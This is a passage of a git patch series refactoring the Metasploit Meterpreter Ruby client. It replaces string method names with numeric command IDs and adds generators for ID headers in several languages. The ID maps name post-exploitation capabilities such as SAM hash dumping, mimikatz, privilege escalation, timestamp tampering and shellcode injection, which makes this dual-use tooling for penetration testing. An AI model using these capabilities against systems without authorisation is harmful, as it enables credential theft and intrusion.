+  'peinjector_inject_shellcode' => COMMAND_ID_START_PEINJECTOR + 1,
+}
+
+COMMAND_ID_MAP_POWERSHELL = {
+  'powershell_assembly_load'  => COMMAND_ID_START_POWERSHELL + 1,
+  'powershell_execute'        => COMMAND_ID_START_POWERSHELL + 2,
+  'powershell_session_remove' => COMMAND_ID_START_POWERSHELL + 3,
+  'powershell_shell'          => COMMAND_ID_START_POWERSHELL + 4,
+}
+
+COMMAND_ID_MAP_PRIV = {
+  'priv_elevate_getsystem'          => COMMAND_ID_START_PRIV + 1,
+  'priv_fs_blank_directory_mace'    => COMMAND_ID_START_PRIV + 2,
+  'priv_fs_blank_file_mace'         => COMMAND_ID_START_PRIV + 3,
+  'priv_fs_get_file_mace'           => COMMAND_ID_START_PRIV + 4,
+  'priv_fs_set_file_mace'           => COMMAND_ID_START_PRIV + 5,
+  'priv_fs_set_file_mace_from_file' => COMMAND_ID_START_PRIV + 6,
+  'priv_passwd_get_sam_hashes'      => COMMAND_ID_START_PRIV + 7,
+}
+
+COMMAND_ID_MAP_PYTHON = {
+  'python_execute' => COMMAND_ID_START_PYTHON + 1,
+  'python_reset'   => COMMAND_ID_START_PYTHON + 2,
+}
+
+COMMAND_ID_MAP_SNIFFER = {
+  'sniffer_capture_dump'      => COMMAND_ID_START_SNIFFER + 1,
+  'sniffer_capture_dump_read' => COMMAND_ID_START_SNIFFER + 2,
+  'sniffer_capture_release'   => COMMAND_ID_START_SNIFFER + 3,
+  'sniffer_capture_start'     => COMMAND_ID_START_SNIFFER + 4,
+  'sniffer_capture_stats'     => COMMAND_ID_START_SNIFFER + 5,
+  'sniffer_capture_stop'      => COMMAND_ID_START_SNIFFER + 6,
+  'sniffer_interfaces'        => COMMAND_ID_START_SNIFFER + 7,
+  }
+
+COMMAND_ID_MAP_UNHOOK = {
+  'unhook_pe' => COMMAND_ID_START_UNHOOK + 1,
+}
+
+COMMAND_ID_MAP = [
+  COMMAND_ID_MAP_CORE,
+  COMMAND_ID_MAP_STDAPI,
+  COMMAND_ID_MAP_PRIV,
+  COMMAND_ID_MAP_EXTAPI,
+  COMMAND_ID_MAP_SNIFFER,
+  COMMAND_ID_MAP_ANDROID,
+  COMMAND_ID_MAP_NETWORKPUG,
+  COMMAND_ID_MAP_WINPMEM,
+  COMMAND_ID_MAP_KIWI,
+  COMMAND_ID_MAP_APPAPI,
+  COMMAND_ID_MAP_UNHOOK,
+  COMMAND_ID_MAP_ESPIA,
+  COMMAND_ID_MAP_INCOGNITO,
+  COMMAND_ID_MAP_PYTHON,
+  COMMAND_ID_MAP_POWERSHELL,
+  COMMAND_ID_MAP_LANATTACKS,
+  COMMAND_ID_MAP_PEINJECTOR,
+  COMMAND_ID_MAP_MIMIKATZ,
+].inject({}) {|m1, m2| m1.merge(m2)}
+
+def self.generate_command_id_map_c
+  id_map = [
+    COMMAND_ID_MAP_CORE,
+    COMMAND_ID_MAP_STDAPI,
+    COMMAND_ID_MAP_PRIV,
+    COMMAND_ID_MAP_EXTAPI,
+    COMMAND_ID_MAP_SNIFFER,
+    COMMAND_ID_MAP_WINPMEM,
+    COMMAND_ID_MAP_KIWI,
+    COMMAND_ID_MAP_UNHOOK,
+    COMMAND_ID_MAP_ESPIA,
+    COMMAND_ID_MAP_INCOGNITO,
+    COMMAND_ID_MAP_PYTHON,
+    COMMAND_ID_MAP_POWERSHELL,
+    COMMAND_ID_MAP_LANATTACKS,
+    COMMAND_ID_MAP_PEINJECTOR,
+    COMMAND_ID_MAP_MIMIKATZ,
+  ].inject({}) {|m1, m2| m1.merge(m2)}
+
+  command_ids = id_map.map {|k, v| "#define COMMAND_ID_#{k.upcase} #{v}"}
+  %Q^
+/*!
+ * @file common_command_ids.h
+ * @brief Declarations of command ID values
+ * @description This file was generated #{Time.now.utc}. Do not modify directly.
+ */
+#ifndef _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+#define _METERPRETER_SOURCE_COMMON_COMMAND_IDS_H
+
+#{command_ids.join("\n")}
+
+#endif
+  ^
+end
+
+def self.generate_command_id_map_python
+  id_map = [
+    COMMAND_ID_MAP_CORE,
+    COMMAND_ID_MAP_STDAPI,
+  ].inject({}) {|m1, m2| m1.merge(m2)}
+  command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"}
+  %Q^
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
+
+#{command_ids.join("\n")}
+
+# ---------------------------------------------------------------
+  ^
+end
+
+def self.generate_command_id_map_python_extension
+  id_map = [
+    COMMAND_ID_MAP_CORE,
+    COMMAND_ID_MAP_STDAPI,
+    COMMAND_ID_MAP_PRIV,
+    COMMAND_ID_MAP_EXTAPI,
+    COMMAND_ID_MAP_SNIFFER,
+    COMMAND_ID_MAP_WINPMEM,
+    COMMAND_ID_MAP_KIWI,
+    COMMAND_ID_MAP_UNHOOK,
+    COMMAND_ID_MAP_ESPIA,
+    COMMAND_ID_MAP_INCOGNITO,
+    COMMAND_ID_MAP_PYTHON,
+    COMMAND_ID_MAP_POWERSHELL,
+    COMMAND_ID_MAP_LANATTACKS,
+    COMMAND_ID_MAP_PEINJECTOR,
+    COMMAND_ID_MAP_MIMIKATZ,
+  ].inject({}) {|m1, m2| m1.merge(m2)}
+  command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"}
+  %Q^
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
+
+#{command_ids.join("\n")}
+
+# ---------------------------------------------------------------
+  ^
+end
+
+def self.generate_command_id_map_csharp
+  id_map = [
+    COMMAND_ID_MAP_CORE,
+    COMMAND_ID_MAP_STDAPI,
+    COMMAND_ID_MAP_PRIV,
+    COMMAND_ID_MAP_EXTAPI,
+    COMMAND_ID_MAP_SNIFFER,
+    COMMAND_ID_MAP_WINPMEM,
+    COMMAND_ID_MAP_KIWI,
+    COMMAND_ID_MAP_UNHOOK,
+    COMMAND_ID_MAP_ESPIA,
+    COMMAND_ID_MAP_INCOGNITO,
+    COMMAND_ID_MAP_PYTHON,
+    COMMAND_ID_MAP_POWERSHELL,
+    COMMAND_ID_MAP_LANATTACKS,
+    COMMAND_ID_MAP_PEINJECTOR,
+    COMMAND_ID_MAP_MIMIKATZ,
+  ].inject({}) {|m1, m2| m1.merge(m2)}
+  command_ids = id_map.map {|k, v| "#{k.split('_').map(&:capitalize).join} = #{v},"}
+  %Q^
+/// <summary>
+// This content was generated by a tool @ #{Time.now.utc}
+/// </summary>
+namespace MSF.Powershell.Meterpreter
+{
+    public enum CommandId
+    {
+        #{command_ids.join("\n        ")}
+    }
+}
+  ^
+end
+
+def self.method_string_to_command_id(method_string)
+  unless COMMAND_ID_MAP.include?(method_string)
+    raise ArgumentError, "Unknown Packet command method string: #{method_string}, please report this to the Metasploit team."
+  end
+
+  COMMAND_ID_MAP[method_string]
+end
+
+def self.command_id_to_method_string(method_int)
+  value = COMMAND_ID_MAP.key(method_int)
+
+  if value.nil?
+    raise ArgumentError, "Unknown Packet command method integer: #{}, please report this to the Metasploit team."
+  end
+
+  value
+end
+
+
 ###
 #
 # Base TLV (Type-Length-Value) class
@@ -274,7 +729,9 @@ def inspect
     else
       tlvs_inspect = "meta=#{meta.ljust 10} value=#{val}"
     end
-    "#<#{self.class} type=#{stype.ljust 15} #{tlvs_inspect}>"
+    extra = ''
+    extra += " method=#{self.method}" if self.class.to_s =~ /Packet/
+    "#<#{self.class} type=#{stype}#{extra} #{tlvs_inspect}>"
   end
 
   ##
@@ -908,6 +1365,7 @@ def response?
   # Checks to see if the packet's method is equal to the supplied method.
   #
   def method?(method)
+    method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String)
     return (get_tlv_value(TLV_TYPE_METHOD) == method)
   end
 
@@ -915,6 +1373,7 @@ def method?(method)
   # Sets the packet's method TLV to the method supplied.
   #
   def method=(method)
+    method = Rex::Post::Meterpreter.method_string_to_command_id(method) if method.is_a?(String)
     add_tlv(TLV_TYPE_METHOD, method, true)
   end
 
@@ -922,7 +1381,8 @@ def method=(method)
   # Returns the value of the packet's method TLV.
   #
   def method
-    return get_tlv_value(TLV_TYPE_METHOD)
+    method = get_tlv_value(TLV_TYPE_METHOD)
+    return Rex::Post::Meterpreter.command_id_to_method_string(method)
   end
 
   #
diff --git a/lib/rex/post/meterpreter/packet_dispatcher.rb b/lib/rex/post/meterpreter/packet_dispatcher.rb
index ef464ac5d8891..46e226962d910 100644
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -129,6 +129,9 @@ def send_packet(packet, opts={})
       tlv_enc_key = opts[:tlv_enc_key]
     end
 
+    # Uncomment this line if you want to see outbound packets in the console.
+    #STDERR.puts("SEND: #{packet.inspect}\n")
+
     bytes = 0
     raw   = packet.to_r(session_guid, tlv_enc_key)
     err   = nil
@@ -559,6 +562,9 @@ def decrypt_inbound_packet(packet)
   def dispatch_inbound_packet(packet)
     handled = false
 
+    # Uncomment this line if you want to see inbound packets in the console
+    #STDERR.puts("RECV: #{packet.inspect}\n")
+
     # Update our last reply time
     self.last_checkin = Time.now
 
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb
index 9634db26cc073..fbb7ffba627c6 100644
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/powershell.rb
@@ -29,12 +29,45 @@ def name
   #
   def commands
     {
-      'powershell_import'   => 'Import a PS1 script or .NET Assembly DLL',
-      'powershell_shell'    => 'Create an interactive Powershell prompt',
-      'powershell_execute'  => 'Execute a Powershell command string'
+      'powershell_import'         => 'Import a PS1 script or .NET Assembly DLL',
+      'powershell_shell'          => 'Create an interactive Powershell prompt',
+      'powershell_execute'        => 'Execute a Powershell command string',
+      'powershell_session_remove' => 'Remove/clear a session (other than default)',
     }
   end
 
+  @@powershell_session_remove = Rex::Parser::Arguments.new(
+    '-s' => [true, 'Specify the id/name of the Powershell session to interact with (cannot be "default").'],
+    '-h' => [false, 'Help banner']
+  )
+
+  def powershell_session_remove_usage
+    print_line('Usage: powershell_session_remove -s session-id')
+    print_line
+    print_line('Removes a named session from the powershell instance.')
+    print_line(@@powershell_session_remove_opts.usage)
+  end
+
+  def cmd_powershell_session_remove(*args)
+    opts = {}
+
+    @@powershell_session_remove_opts.parse(args) { |opt, idx, val|
+      case opt
+      when '-s'
+        opts[:session_id] = val
+      end
+    }
+
+    if opts[:session_id].nil? || opts[:session_id].downcase == 'default' || args.include?('-h')
+      powershell_session_remove_usage
+      return false
+    else
+      client.powershell.session_remove(opts)
+      print_success("Session '#{opts[:session_id]}' removed.")
+      return true
+    end
+  end
+
   @@powershell_shell_opts = Rex::Parser::Arguments.new(
     '-s' => [true, 'Specify the id/name of the Powershell session to interact with.'],
     '-h' => [false, 'Help banner']

From d87cb8ca632da4c49b657cd993751fcd376f3732 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Thu, 30 Apr 2020 17:36:48 +1000
Subject: [PATCH 03/20] Java-related UINT command ID generation

---
 lib/rex/post/meterpreter/packet.rb | 45 ++++++++++++++++++++++++++++--
 1 file changed, 42 insertions(+), 3 deletions(-)

diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index 2dcb91488aba9..83e8c2bcecc85 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -494,18 +494,57 @@ def self.generate_command_id_map_c
   ^
 end
 
-def self.generate_command_id_map_python
+def self.generate_command_id_map_java
   id_map = [
     COMMAND_ID_MAP_CORE,
     COMMAND_ID_MAP_STDAPI,
   ].inject({}) {|m1, m2| m1.merge(m2)}
-  command_ids = id_map.map {|k, v| "COMMAND_ID_#{k.upcase} = #{v}"}
+  command_ids = id_map.map {|k, v| "    public static final int #{k.upcase} = #{v};"}
+  %Q^
+package com.metasploit.meterpreter.command;
+
+/**
+ * All supported Command Identifiers
+ *
+ * @author Genereated by a tool @ #{Time.now.utc}
+ */
+public interface CommandId {
+#{command_ids.join("\n")}
+}
+  ^
+end
+
+def self.generate_command_id_map_php_lib(lib, id_map)
+  command_ids = id_map.map {|k, v| "define('COMMAND_ID_#{k.upcase}', #{v});"}
   %Q^
 # ---------------------------------------------------------------
 # --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
-
+# IDs for #{lib}
 #{command_ids.join("\n")}
+# ---------------------------------------------------------------
+  ^
+end
 
+def self.generate_command_id_map_php
+  %Q^
+#{self.generate_command_id_map_php_lib('metsrv', COMMAND_ID_MAP_CORE)}
+
+#{self.generate_command_id_map_php_lib('stdapi', COMMAND_ID_MAP_STDAPI)}
+  ^
+end
+
+def self.generate_command_id_map_python
+  id_map = [
+    COMMAND_ID_MAP_CORE,
+    COMMAND_ID_MAP_STDAPI,
+  ].inject({}) {|m1, m2| m1.merge(m2)}
+  command_ids = id_map.map {|k, v| "    (#{v}, '#{k.downcase}'),"}
+  %Q^
+# ---------------------------------------------------------------
+# --- THIS CONTENT WAS GENERATED BY A TOOL @ #{Time.now.utc}
+COMMAND_IDS = (
+#{command_ids.join("\n")}
+)
 # ---------------------------------------------------------------
   ^
 end

From 8070074da39e8cb11ef3677cfa31c27117d76383 Mon Sep 17 00:00:00 2001
From: OJ <oj@buffered.io>
Date: Mon, 4 May 2020 13:32:08 +1000
Subject: [PATCH 04/20] Almost final refactor of how IDs are handled

---
 lib/rex/payloads/meterpreter/config.rb        |  18 +-
 lib/rex/post/meterpreter/channel.rb           |  10 +-
 lib/rex/post/meterpreter/channels/pool.rb     |  13 +-
 lib/rex/post/meterpreter/client.rb            |  13 +-
 lib/rex/post/meterpreter/client_core.rb       |  61 +-
 lib/rex/post/meterpreter/core_ids.rb          |  51 ++
 lib/rex/post/meterpreter/extension.rb         |   4 +-
 lib/rex/post/meterpreter/extension_mapper.rb  |  32 ++
 .../meterpreter/extensions/android/android.rb |  40 +-
 .../meterpreter/extensions/android/tlv.rb     |  20 +
 .../meterpreter/extensions/appapi/appapi.rb   |  12 +-
 .../post/meterpreter/extensions/appapi/tlv.rb |   9 +
 .../meterpreter/extensions/espia/espia.rb     |  27 +-
 .../post/meterpreter/extensions/espia/tlv.rb  |   6 +
 .../extensions/extapi/adsi/adsi.rb            |   2 +-
 .../extensions/extapi/clipboard/clipboard.rb  |  18 +-
 .../meterpreter/extensions/extapi/extapi.rb   |   4 +
 .../extensions/extapi/ntds/ntds.rb            |   2 +-
 .../extensions/extapi/pageant/pageant.rb      |  80 +--
 .../extensions/extapi/service/service.rb      |   6 +-
 .../post/meterpreter/extensions/extapi/tlv.rb |  21 +
 .../extensions/extapi/window/window.rb        | 109 ++--
 .../meterpreter/extensions/extapi/wmi/wmi.rb  |   2 +-
 .../extensions/incognito/incognito.rb         |  22 +-
 .../meterpreter/extensions/incognito/tlv.rb   |  11 +
 .../post/meterpreter/extensions/kiwi/kiwi.rb  |   6 +-
 .../post/meterpreter/extensions/kiwi/tlv.rb   |  10 +-
 .../extensions/lanattacks/dhcp/dhcp.rb        |  10 +-
 .../extensions/lanattacks/lanattacks.rb       |   4 +
 .../extensions/lanattacks/tftp/tftp.rb        |   8 +-
 .../meterpreter/extensions/lanattacks/tlv.rb  |  14 +
 .../extensions/mimikatz/mimikatz.rb           |   6 +-
 .../meterpreter/extensions/mimikatz/tlv.rb    |   6 +
 .../extensions/networkpug/networkpug.rb       |  12 +-
 .../meterpreter/extensions/networkpug/tlv.rb  |   7 +
 .../extensions/peinjector/peinjector.rb       | 487 ++++++++--------
 .../meterpreter/extensions/peinjector/tlv.rb  |  15 +-
 .../extensions/powershell/powershell.rb       |  11 +-
 .../meterpreter/extensions/powershell/tlv.rb  |   9 +
 .../post/meterpreter/extensions/priv/fs.rb    |  12 +-
 .../post/meterpreter/extensions/priv/priv.rb  |  38 +-
 .../post/meterpreter/extensions/priv/tlv.rb   |  12 +
 .../meterpreter/extensions/python/python.rb   |  10 +-
 .../post/meterpreter/extensions/python/tlv.rb |   8 +
 .../meterpreter/extensions/sniffer/sniffer.rb |  20 +-
 .../meterpreter/extensions/sniffer/tlv.rb     |  13 +
 .../extensions/stdapi/constants.rb            |   1 +
 .../meterpreter/extensions/stdapi/fs/dir.rb   |  20 +-
 .../meterpreter/extensions/stdapi/fs/file.rb  |  18 +-
 .../extensions/stdapi/fs/file_stat.rb         |   2 +-
 .../meterpreter/extensions/stdapi/fs/mount.rb |   2 +-
 .../meterpreter/extensions/stdapi/mic/mic.rb  | 105 ++--
 .../extensions/stdapi/net/config.rb           |  18 +-
 .../extensions/stdapi/net/resolve.rb          |   4 +-
 .../socket_subsystem/tcp_client_channel.rb    |   2 +-
 .../socket_subsystem/tcp_server_channel.rb    |   4 +-
 .../extensions/stdapi/railgun/library.rb      |   2 +-
 .../extensions/stdapi/railgun/multicall.rb    |   2 +-
 .../extensions/stdapi/railgun/railgun.rb      |   4 +-
 .../meterpreter/extensions/stdapi/stdapi.rb   |   4 +
 .../extensions/stdapi/sys/config.rb           |  20 +-
 .../extensions/stdapi/sys/event_log.rb        |  16 +-
 .../extensions/stdapi/sys/power.rb            |   6 +-
 .../extensions/stdapi/sys/process.rb          |  20 +-
 .../stdapi/sys/process_subsystem/image.rb     |  10 +-
 .../stdapi/sys/process_subsystem/memory.rb    |  22 +-
 .../stdapi/sys/process_subsystem/thread.rb    |   6 +-
 .../extensions/stdapi/sys/registry.rb         |  40 +-
 .../extensions/stdapi/sys/thread.rb           |  12 +-
 .../post/meterpreter/extensions/stdapi/tlv.rb | 124 +++++
 .../post/meterpreter/extensions/stdapi/ui.rb  |  44 +-
 .../extensions/stdapi/webcam/webcam.rb        |  10 +-
 .../post/meterpreter/extensions/unhook/tlv.rb |  10 +-
 .../meterpreter/extensions/unhook/unhook.rb   |   8 +-
 .../meterpreter/extensions/winpmem/tlv.rb     |  12 +-
 .../meterpreter/extensions/winpmem/winpmem.rb |  10 +-
 lib/rex/post/meterpreter/packet.rb            | 520 +-----------------
 lib/rex/post/meterpreter/packet_dispatcher.rb |   2 +-
 lib/rex/post/meterpreter/pivot.rb             |   8 +-
 .../ui/console/command_dispatcher/android.rb  |  30 +-
 .../ui/console/command_dispatcher/appapi.rb   |  74 +--
 .../ui/console/command_dispatcher/espia.rb    |   2 -
 .../ui/console/command_dispatcher/extapi.rb   |   2 +-
 .../console/command_dispatcher/extapi/adsi.rb |  12 +-
 .../command_dispatcher/extapi/clipboard.rb    |  34 +-
 .../command_dispatcher/extapi/service.rb      |  12 +-
 .../command_dispatcher/extapi/window.rb       | 247 ++++-----
 .../console/command_dispatcher/extapi/wmi.rb  |   6 +-
 .../console/command_dispatcher/incognito.rb   |  12 +-
 .../command_dispatcher/lanattacks/dhcp.rb     |  24 +-
 .../command_dispatcher/lanattacks/tftp.rb     |  18 +-
 .../console/command_dispatcher/networkpug.rb  |   8 +-
 .../command_dispatcher/priv/elevate.rb        |  12 +-
 .../console/command_dispatcher/priv/passwd.rb |   4 +-
 .../command_dispatcher/priv/timestomp.rb      | 311 +++++------
 .../ui/console/command_dispatcher/python.rb   |   6 +-
 .../ui/console/command_dispatcher/sniffer.rb  |  25 +-
 .../command_dispatcher/stdapi/audio_output.rb |   7 +-
 .../console/command_dispatcher/stdapi/fs.rb   |  40 +-
 .../console/command_dispatcher/stdapi/mic.rb  | 380 ++++++-------
 .../console/command_dispatcher/stdapi/net.rb  |  18 +-
 .../console/command_dispatcher/stdapi/sys.rb  | 116 ++--
 .../console/command_dispatcher/stdapi/ui.rb   |  60 +-
 .../command_dispatcher/stdapi/webcam.rb       |  30 +-
 .../ui/console/command_dispatcher/winpmem.rb  | 143 ++---
 105 files changed, 1982 insertions(+), 2050 deletions(-)
 create mode 100644 lib/rex/post/meterpreter/core_ids.rb
 create mode 100644 lib/rex/post/meterpreter/extension_mapper.rb

diff --git a/lib/rex/payloads/meterpreter/config.rb b/lib/rex/payloads/meterpreter/config.rb
index dd10f675de559..cc4287ca8626f 100644
--- a/lib/rex/payloads/meterpreter/config.rb
+++ b/lib/rex/payloads/meterpreter/config.rb
@@ -3,6 +3,7 @@
 require 'msf/core/payload/windows'
 require 'msf/core/reflective_dll_loader'
 require 'rex/socket/x509_certificate'
+require 'rex/post/meterpreter/extension_mapper'
 require 'securerandom'
 
 class Rex::Payloads::Meterpreter::Config
@@ -132,24 +133,25 @@ def transport_block(opts)
 
   def extension_block(ext_name, file_extension)
     ext_name = ext_name.strip.downcase
-    ext, o = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
+    ext, _ = load_rdi_dll(MetasploitPayloads.meterpreter_path("ext_server_#{ext_name}",
                                                               file_extension))
 
-    extension_data = [ ext.length, ext ].pack('VA*')
+    [ ext.length, ext ].pack('VA*')
   end
 
   def extension_init_block(name, value)
+    ext_id = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(name)
+
     # for now, we're going to blindly assume that the value is a path to a file
     # which contains the data that gets passed to the extension
-    content = ::File.read(value)
+    content = ::File.read(value) + "\x00\x00"
     data = [
-      name,
-      "\x00",
+      ext_id,
       content.length,
       content
     ]
 
-    data.pack('A*A*VA*')
+    data.pack('VVA*')
   end
 
   def config_block
@@ -182,8 +184,8 @@ def config_block
       config << extension_init_block(name, value)
     end
 
-    # terminate the ext init config with a final null byte
-    config << "\x00"
+    # terminate the ext init config with -1
+    config << "\xFF\xFF\xFF\xFF"
 
     # and we're done
     config
diff --git a/lib/rex/post/meterpreter/channel.rb b/lib/rex/post/meterpreter/channel.rb
index 5f697aaf4a40f..eb1be874cd9e1 100644
--- a/lib/rex/post/meterpreter/channel.rb
+++ b/lib/rex/post/meterpreter/channel.rb
@@ -94,7 +94,7 @@ def request_handler(client, packet)
   #
   def Channel.create(client, type = nil, klass = nil,
       flags = CHANNEL_FLAG_SYNCHRONOUS, addends = nil, **klass_kwargs)
-    request = Packet.create_request('core_channel_open')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_OPEN)
 
     # Set the type of channel that we're allocating
     if !type.nil?
@@ -179,7 +179,7 @@ def _read(length = nil, addends = nil)
       raise IOError, "Channel has been closed.", caller
     end
 
-    request = Packet.create_request('core_channel_read')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_READ)
 
     if length.nil?
       # Default block size to a higher amount for passive dispatcher
@@ -227,7 +227,7 @@ def _write(buf, length = nil, addends = nil)
       raise IOError, "Channel has been closed.", caller
     end
 
-    request = Packet.create_request('core_channel_write')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_WRITE)
 
     # Truncation and celebration
     if ((length != nil) &&
@@ -290,7 +290,7 @@ def self._close(client, cid, addends=nil)
       raise IOError, "Channel has been closed.", caller
     end
 
-    request = Packet.create_request('core_channel_close')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_CLOSE)
 
     # Populate the request
     request.add_tlv(TLV_TYPE_CHANNEL_ID, cid)
@@ -322,7 +322,7 @@ def interactive(tf = true, addends = nil)
       raise IOError, "Channel has been closed.", caller
     end
 
-    request = Packet.create_request('core_channel_interact')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_INTERACT)
 
     # Populate the request
     request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
diff --git a/lib/rex/post/meterpreter/channels/pool.rb b/lib/rex/post/meterpreter/channels/pool.rb
index f0b283e94367c..a413057657b4c 100644
--- a/lib/rex/post/meterpreter/channels/pool.rb
+++ b/lib/rex/post/meterpreter/channels/pool.rb
@@ -51,7 +51,7 @@ def initialize(client, cid, type, flags, packet, **_)
   # Checks to see if the EOF flag has been set on the pool.
   #
   def eof
-    request = Packet.create_request('core_channel_eof')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_EOF)
 
     request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
 
@@ -106,33 +106,32 @@ def seek(offset, whence = SEEK_SET)
         raise RuntimeError, "Invalid seek whence #{whence}.", caller
     end
 
-    request = Packet.create_request('core_channel_seek')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_SEEK)
 
     request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
     request.add_tlv(TLV_TYPE_SEEK_OFFSET, offset)
     request.add_tlv(TLV_TYPE_SEEK_WHENCE, sane)
 
     begin
-      response = self.client.send_request(request)
+      self.client.send_request(request)
+      tell
     rescue
       return -1
     end
-
-    return tell
   end
 
   #
   # Synonym for tell.
   #
   def pos
-    return tell
+    tell
   end
 
   #
   # This method returns the current file pointer position to the caller.
   #
   def tell
-    request = Packet.create_request('core_channel_tell')
+    request = Packet.create_request(COMMAND_ID_CORE_CHANNEL_TELL)
     pos     = -1
 
     request.add_tlv(TLV_TYPE_CHANNEL_ID, self.cid)
diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb
index 4fa77316b5242..82caf1b4ace9d 100644
--- a/lib/rex/post/meterpreter/client.rb
+++ b/lib/rex/post/meterpreter/client.rb
@@ -4,6 +4,7 @@
 require 'openssl'
 
 require 'rex/script'
+require 'rex/post/meterpreter/extension_mapper'
 require 'rex/post/meterpreter/client_core'
 require 'rex/post/meterpreter/channel'
 require 'rex/post/meterpreter/channel_container'
@@ -321,17 +322,7 @@ def add_extension(name, commands=[])
 
     # Check to see if this extension has already been loaded.
     if ((klass = self.class.check_ext_hash(name.downcase)) == nil)
-      old = Rex::Post::Meterpreter::Extensions.constants
-      require("rex/post/meterpreter/extensions/#{name.downcase}/#{name.downcase}")
-      new = Rex::Post::Meterpreter::Extensions.constants
-
-      # No new constants added?
-      if ((diff = new - old).empty?)
-        diff = [ name.capitalize ]
-      end
-
-      klass = Rex::Post::Meterpreter::Extensions.const_get(diff[0]).const_get(diff[0])
-
+      klass = Rex::Post::Meterpreter::ExtensionMapper.get_extension_klass(name)
       # Save the module name to class association now that the code is
       # loaded.
       self.class.set_ext_hash(name.downcase, klass)
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb
index 18e013e29ec03..ace583fb52501 100644
--- a/lib/rex/post/meterpreter/client_core.rb
+++ b/lib/rex/post/meterpreter/client_core.rb
@@ -1,7 +1,9 @@
 # -*- coding: binary -*-
 
 require 'rex/post/meterpreter/packet'
+require 'rex/post/meterpreter/core_ids'
 require 'rex/post/meterpreter/extension'
+require 'rex/post/meterpreter/extension_mapper'
 require 'rex/post/meterpreter/client'
 require 'msf/core/payload/transport_config'
 
@@ -47,6 +49,10 @@ class ClientCore < Extension
 
   include Rex::Payloads::Meterpreter::UriChecksum
 
+  def self.extension_id
+    EXTENSION_ID_CORE
+  end
+
   #
   # Initializes the 'core' portion of the meterpreter client commands.
   #
@@ -64,7 +70,7 @@ def initialize(client)
   # create a named pipe pivot
   #
   def create_named_pipe_pivot(opts)
-    request = Packet.create_request('core_pivot_add')
+    request = Packet.create_request(COMMAND_ID_CORE_PIVOT_ADD)
     request.add_tlv(TLV_TYPE_PIVOT_NAMED_PIPE_NAME, opts[:pipe_name])
 
 
@@ -95,15 +101,18 @@ def create_named_pipe_pivot(opts)
     request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA, stage)
     request.add_tlv(TLV_TYPE_PIVOT_STAGE_DATA_SIZE, stage.length)
 
-    response = self.client.send_request(request)
+    self.client.send_request(request)
   end
 
   #
   # Get a list of loaded commands for the given extension.
   #
   def get_loaded_extension_commands(extension_name)
-    request = Packet.create_request('core_enumextcmd')
-    request.add_tlv(TLV_TYPE_STRING, extension_name)
+    request = Packet.create_request(COMMAND_ID_CORE_ENUMEXTCMD)
+
+    start = Rex::Post::Meterpreter::ExtensionMapper.get_extension_id(extension_name)
+    request.add_tlv(TLV_TYPE_UINT, start)
+    request.add_tlv(TLV_TYPE_LENGTH, COMMAND_ID_RANGE)
 
     begin
       response = self.client.send_packet_wait_response(request, self.client.response_timeout)
@@ -133,7 +142,7 @@ def get_loaded_extension_commands(extension_name)
   end
 
   def transport_list
-    request = Packet.create_request('core_transport_list')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_LIST)
     response = client.send_request(request)
 
     result = {
@@ -163,7 +172,7 @@ def transport_list
   # Set associated transport timeouts for the currently active transport.
   #
   def set_transport_timeouts(opts={})
-    request = Packet.create_request('core_transport_set_timeouts')
+    request = Packet.create_request(COMMAND_ID_CORE_TRANSPORT_SET_TIMEOUTS)
 
     if opts[:session_exp]
       request.add_tlv(TLV_TYPE_TRANS_SESSION_EXP, opts[:session_exp])
@@ -239,7 +248,7 @@ def load_library(opts)
     end
 
     # Create a request packet
-    request = Packet.create_request('core_loadlib')
+    request = Packet.create_request(COMMAND_ID_CORE_LOADLIB)
 
     # If we must upload the library, do so now
     if (load_flags & LOAD_LIBRARY_FLAG_LOCAL) != LOAD_LIBRARY_FLAG_LOCAL
@@ -263,7 +272,7 @@ def load_library(opts)
       # name
       if opts['Extension']
         if client.binary_suffix and client.binary_suffix.size > 1
-          m = /(.*)\.(.*)/.match(library_path)
+          /(.*)\.(.*)/.match(library_path)
           suffix = $2
         elsif client.binary_suffix.size == 1
           suffix = client.binary_suffix[0]
@@ -381,7 +390,7 @@ def use(mod, opts = { })
   # Set the UUID on the target session.
   #
   def set_uuid(uuid)
-    request = Packet.create_request('core_set_uuid')
+    request = Packet.create_request(COMMAND_ID_CORE_SET_UUID)
     request.add_tlv(TLV_TYPE_UUID, uuid.to_raw)
 
     client.send_request(request)
